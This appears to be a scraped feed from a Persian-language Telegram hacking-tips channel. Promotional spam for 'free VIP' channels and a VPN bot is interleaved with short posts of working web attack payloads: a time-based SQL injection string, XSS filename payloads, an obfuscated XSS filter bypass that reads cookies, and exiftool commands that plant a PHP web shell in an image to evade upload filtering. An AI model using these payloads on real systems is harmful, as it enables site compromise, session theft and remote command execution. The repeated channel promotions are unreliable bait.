به مناسبت ۲ ساله شدن عمر چنلمون چنل vip که قیمت یک میلیون هست به ۱۰ نفر اول رایگان میدیم و بعد از ۱۰ نفر به طور خودکار لینک باطل میشه جوین بدین👇👇👇
/channel/+waqvcEXtEP9lYjlh
/channel/+waqvcEXtEP9lYjlh
#تبلیغ_نیست
🗒IDOR allow Zero Click account takeover on a web3 program
@PenTest_Tm
بچها من زیاد تست کردم تنها سرور هایی که الان وصله و قطعی خیلی کمی داره نسبت به بقیه سرور های Connectix هستن اینستاگرام هم به راحتی باز میکنه فقط محدوده مکانی که هستین شاید جواب نده که بعیده سرور تست بگیرین تست کنید یا از ادمین ربات بپرسید راهنماییتون میکنه
@RMVpN_bot
رسما بگا رفتیم احتمال زیاد وضعیت اینترنت خیلی بدتر میشه 🖤
Читать полностью…
📍دنبال یه کانال خفن تو زمینهای که دوست داری؟
🖱اینجاست! پرمخاطب، پرمحتوا، دقیقاً همون چیزی که میخوای!
👑 به پاس حمایت های فراوان شما دوستان عزیز کانال های (VIP) تلگرام رایــــگان شد.👇👇
📰عضو شو ظرفیت محدوده📰
✈️Link VIP : /channel/addlist/-8ouei0L4LwzNjNk
➕این فرصت استثنائی رو از دست نده
ورود به چنل VIP 👇
ورود چنل VIP سیگنال های رایگان.
⭐️ اگه برنامه نویسی ، دانشجویی یا دنبال یادگیری هستی که به درامد برسی بیا اینجا . . .
🔸/channel/addlist/ktmNFMWD_OhhMjY0
🗒 SQL Injection
After this, use sqlmap to extract the database
-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--
🗒 XSS Payload Generator
تولید Payload با سناریو های مختلف و پشتیبانی از انواع متد با قابلیت ساخت پیلود برای دور زدن WAF و همچنین مبهم سازی پیلود و اضافه کردن کد جاوااسکریپت برای ساخت پیلود های پیشرفته تر و فیلتر پیشرفته کاراکترها برای دور زدن محدودیت هایی که هست
@PenTest_Tm
🗒SSTI - RCE - CI
https://dolomite-slip-02b.notion.site/SSTI-RCE-CI-76c2f9d2808649c197d08b0d0ecd0e5b?pvs=25
@PenTest_Tm
🗒 How I was able to discover ATO Via IDOR vulnerability
0x_xnum/idor-leads-to-account-takeover-of-all-users-ato-27af312c8481" rel="nofollow">https://medium.com/@0x_xnum/idor-leads-to-account-takeover-of-all-users-ato-27af312c8481
@PenTest_Tm
به مناسبت ۲ ساله شدن عمر چنلمون چنل vip که قیمت یک میلیون هست به ۱۰ نفر اول رایگان میدیم و بعد از ۱۰ نفر به طور خودکار لینک باطل میشه جوین بدین👇👇👇
/channel/+0X1IlMjfKSExMWEx
/channel/+0X1IlMjfKSExMWEx
#تبلیغ_نیست
💎 قیمت این کانال : 20000000 تومان 💎
👈 عضو نشدن در این کانال مساوی از دست رفتن 2000 پکیج پولی 🔥
/channel/+KpFy9SH1znxlODRh
🔖وقتتو برای گشتن دنبال پروژهها، موقعیتهای شغلی، فیلمهای آموزشی، کتاب و جزوه هدر نده!
🔸 فرصت رو از دست نده، همه منتظرشن! 🚀
💠عضویت = دسترسی به کلی کانال کاربردی.فقط یه کلیک کافیه!
🔸/channel/addlist/-8ouei0L4LwzNjNk
👑 پکیجی کامل از بهترین کانال های تلگرام به صورت تخصصی براتون جمع آوری کردیم ، که تصمیم گرفتیم به مدت 2 ساعت #رایگان در اختیار شما عزیزان قرار بدیم.👇
ظرفیت محدود👇
🗒 File Upload via XSS
If you found a file upload function for an image, try introducing an image with XSS in the filename like so:
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
🗒 Bypass XSS Filter with Array
<noscript><p title="</noscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>">
🗒 Bypass File Upload Filtering
In image:
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>'
shell.jpg
mv shell.jpg shell.php.jpg
🗒 MetaMask Subdomain Takeover (Consensys) | $500 Bug Bounty Poc | Subdomain Takeover Method
https://youtu.be/xP-u9i3N-3U?si=ooLVhCem9w5aSWos
@PenTest_Tm